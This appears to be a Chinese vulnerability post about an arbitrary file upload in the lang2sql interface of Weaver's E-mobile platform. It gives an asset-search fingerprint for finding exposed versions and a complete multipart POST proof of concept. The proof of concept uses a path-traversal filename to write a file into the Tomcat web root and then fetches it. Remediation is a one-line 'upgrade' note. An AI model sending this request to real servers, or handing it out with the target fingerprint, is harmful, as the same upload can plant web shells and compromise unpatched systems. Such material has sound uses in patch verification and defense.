泛微移动管理平台E-mobile lang2sql接口存在任意文件上传

1.简介

泛微OA E-mobile系统 lang2sql接口存在任意文件上传漏洞,由于后端源码中没有对文件没有校验,导致任意文件上传。攻击者可利用该参数构造恶意数据包进行上传漏洞攻击。

2.资产测绘

web.body="当前版本: 20190924"

泛微移动管理平台E-mobile lang2sql接口存在任意文件上传_第1张图片

3.poc 

 /emp/lang2sql?client_type=1&lang_tag=1

泛微移动管理平台E-mobile lang2sql接口存在任意文件上传_第2张图片 

POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1

Host: 

User-Agent: Mozilla

Accept: text/html

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 205

Content-Type: multipart/form-data;boundary=----test

------test

Content-Disposition: form-data; name="file"; filename="../../../../appsvr/tomcat/webapps/ROOT/123.txt"

1234

------test--

泛微移动管理平台E-mobile lang2sql接口存在任意文件上传_第3张图片

访问/123.txt 

泛微移动管理平台E-mobile lang2sql接口存在任意文件上传_第4张图片

4.修复建议   

     升级至新版本。。。。。。。。。。。

你可能感兴趣的:(安全,web安全)